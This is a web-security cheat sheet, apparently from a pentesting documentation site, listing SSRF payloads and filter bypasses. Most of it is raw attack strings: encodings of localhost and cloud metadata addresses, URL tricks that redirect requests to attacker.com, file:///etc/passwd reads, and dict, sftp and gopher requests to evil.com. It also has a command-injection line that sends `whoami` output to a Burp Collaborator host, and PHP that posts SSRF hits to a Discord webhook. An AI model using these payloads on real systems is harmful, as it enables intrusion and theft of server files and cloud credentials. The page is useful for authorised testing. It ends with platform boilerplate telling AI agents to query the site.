> For the complete documentation index, see [llms.txt](https://sec88.0x88.online/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sec88.0x88.online/web-appsec/ssrf.md). # SSRF ## Local Host ```bash All IPv4: 0 All IPv6: :: All IPv4: 0.0.0.0 Localhost IPv6: ::1 All IPv4: 0000 All IPv4: (Leading zeros): 00000000 IPv4 mapped IPv6 address: 0:0:0:0:0:FFFF:7F00:0001 8-Bit Octal conversion: 0177.00.00.01 32-Bit Octal conversion: 017700000001 32-Bit Hex conversion: 0x7f000001 # Localhost http:@0/ --> http://[::]:80/ http://[::]:25/ SMTP http://[::]:3128/ Squid http://[0000::1]:80/ http://[0:0:0:0:0:ffff:127.0.0.1]/thefile # CDIR bypass # Dot bypass 127。0。0。1 127%E3%80%820%E3%80%820%E3%80%821 # Decimal bypass = = = # Octal Bypass # Hexadecimal bypass 127.0.0.1 = 0x7f 00 00 01 = = 0x7f.0x00.0x00.0x01 0x0000007f.0x00000000.0x00000000.0x00000001 # Add 0s bypass 127.000000000000.1 # You can also mix different encoding formats # # Malformed and rare localhost:+11211aaa localhost:00011211aaaa # DNS to localhost localtest.me = 127.0.0.1 customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1 mail.ebc.apple.com = 127.0.0.6 (localhost) 127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP) www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com = 127.0.0.2 (localhost) 1ynrnhl.xip.io == 169.254.169.254 spoofed.burpcollaborator.net = 127.0.0.1 ``` #### various bypasses ```xml 127.0.0.1:80 127.0.0.1:443 127.0.0.1:22 127.1:80 0 0.0.0.0:80 localhost:80 [::]:80/ [::]:25/ SMTP [::]:3128/ Squid [0000::1]:80/ [0:0:0:0:0:ffff:127.0.0.1]/thefile ①②⑦.⓪.⓪.⓪ 127.127.127.127 127.0.1.3 127.0.0.0 2130706433/ 017700000001 3232235521/ 3232235777/ 0x7f000001/ 0xc0a80014/ {domain}@127.0.0.1 127.0.0.1#{domain} {domain}.127.0.0.1 127.0.0.1/{domain} 127.0.0.1/?d={domain} {domain}@127.0.0.1 127.0.0.1#{domain} {domain}.127.0.0.1 127.0.0.1/{domain} 127.0.0.1/?d={domain} {domain}@localhost localhost#{domain} {domain}.localhost localhost/{domain} localhost/?d={domain} 127.0.0.1%00{domain} 127.0.0.1?{domain} 127.0.0.1///{domain} 127.0.0.1%00{domain} 127.0.0.1?{domain} 127.0.0.1///{domain}st:+11211aaa st:00011211aaaa 0/ 127.1 127.0.1 1.1.1.1 &@2.2.2.2# @3.3.3.3/ 127.1.1.1:80\\@127.2.2.2:80/ 127.1.1.1:80\\@@127.2.2.2:80/ 127.1.1.1:80:\\@@127.2.2.2:80/ 127.1.1.1:80#\\@127.2.2.2:80/ ``` ## Domain ```bash https:attacker.com https:/attacker.com http:/\\/\\attacker.com https:/\\attacker.com //attacker.com \\/\\/attacker.com/ /\\/attacker.com/ /attacker.com %0D%0A/attacker.com #attacker.com #%20@attacker.com @attacker.com attacker%00.com attacker%E3%80%82com attacker。com ⒶⓉⓉⒶⒸⓀⒺⓡ.Ⓒⓞⓜ # Try also to change attacker.com for 127.0.0.1 to try to access localhost # Try replacing https by http # Try URL-encoded characters https://{domain}.attacker.com @{domain} %23@{domain} %00{domain} %0A{domain} \\{domain}/ ;https://{domain} \\{domain}/ \\.{domain} } \\@@{domain} :\\@@{domain} \\anything@{domain}/ (\\u2044)some(\\u2044)path(\\u2044)(\\u0294)some=param(\\uff03)hash@attacker.com # On each IP position try to put 1 attackers domain and the others the victim domain &@2.2.2.2# @3.3.3.3/ #Parameter pollution next={domain}&next=attacker.com # Bypass via open redirect ``` #### Cloud Meta Data files ```bash ## AWS # from [ROLE NAME] [ROLE NAME] # AWS - Dirs ## Google Cloud # # - Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" # Google allows recursive pulls ## Google # Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn) ## Digital Ocean # ## Packetcloud ## Azure # Limited, maybe more exist? # ## Update Apr 2017, Azure has more support; requires the header "Metadata: true" # ## OpenStack/RackSpace # (header required? unknown) ## HP Helion # (header required? unknown) ## Oracle Cloud ## Alibaba ## Enclosed Alphanumeric 。②⑤④。⑯⑨。②⑤④/ 。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/ Successfully bypassed a SSRF WAF by using a combination of IPV6 + Unicode. Payload for Metadata instances: http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80 Check images for response difference between 169.254.169.254 and the above payload I shared ``` ## Protocols ```bash file:///etc/passwd dict://;@:/d::: ssrf.php?url=dict://attacker:11111/ ssrf.php?url=sftp://evil.com:11111/ ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET ssrf.php?url=ldap://localhost:11211/%0astats%0aquit # Gopher:// Fortunately, you can use Gopherus[] to create payloads for several services. Additionally, remote-method-guesser[] can be used to create gopher payloads for Java RMI services ``` ## Other Test Cases ```bash # SSRF via Referrer header # SSRF via SNI data from certificate --> openssl s_client -connecttarget.com:443 -servername "internal.host.com" -crlf # Wget File Upload # SSRF with Command Injection url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami` # PDFs Rendering If the web page is automatically creating a PDF with some information you have provided, you can insert some JS that will be executed by the PDF creator itself (the server) while creating the PDF and you will be able to abuse a SSRF. Find more information here. # From SSRF to DoS Create several sessions and try to download heavy files exploiting the SSRF from the sessions. # SSRf PHP Functions ``` ## [Make you own SSRF tool](https://medium.com/@a1bi/ssrf-get-notified-on-discord-whenever-you-have-an-ssrf-5162a6daf8a3) Host this PHP code after editing discord webhook in your server to get notified whenever there is SSRF ````php

Hit Me Harder :)

"; $webhook_url = "https://discord.com/api/webhooks/10589949/E9uS3k9MxnI5CiIfmtmXHfornTObgZ_xl"; // replace with your webhook URL $message = array("content" => "$log_message"); // the message you want to send $ch = curl_init($webhook_url); curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-type: application/json')); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($message)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_exec($ch); curl_close($ch); ?> ```` ## SSRF Bypasses {% embed url="" %} ``` file:/etc/passwd?/ file:/etc/passwd%3F/ file:/etc%252Fpasswd/ file:/etc%252Fpasswd%3F/ file:///etc/?/../passwd file:///etc/%3F/../passwd file:${br}/et${u}c/pas${te}swd?/ file:$(br)/et$(u)c/pas$(te)swd?/ file:${br}/et${u}c%252Fpas${te}swd?/ file:$(br)/et$(u)c%252Fpas$(te)swd?/ file:${br}/et${u}c%252Fpas${te}swd%3F/ file:$(br)/et$(u)c%252Fpas$(te)swd%3F/ file:///etc/passwd?/../passwd ``` ## Resources [URL Format Bypass - HackTricks](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass) [SSRF vulnerabilities and where to find them - Detectify Labs](https://labs.detectify.com/2022/09/23/ssrf-vulns-and-where-to-find-them/?fbclid=IwAR0xC3ymb4ufRUGRDOZWr7lleeatiJj_vH8dod9-84jKt0PN1z7evtHFccA) #### Youtube * * * * * * * [A New Era of SSRF](https://www.youtube.com/watch?v=R9pJ2YCXoJQ) by [Orange Tsai](https://blog.orange.tw/) #### Hackerone Reports * * * * * * * * * * * * * * * * * * * * * #### Blogs * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * #### Github Repos * * --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sec88.0x88.online/web-appsec/ssrf.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.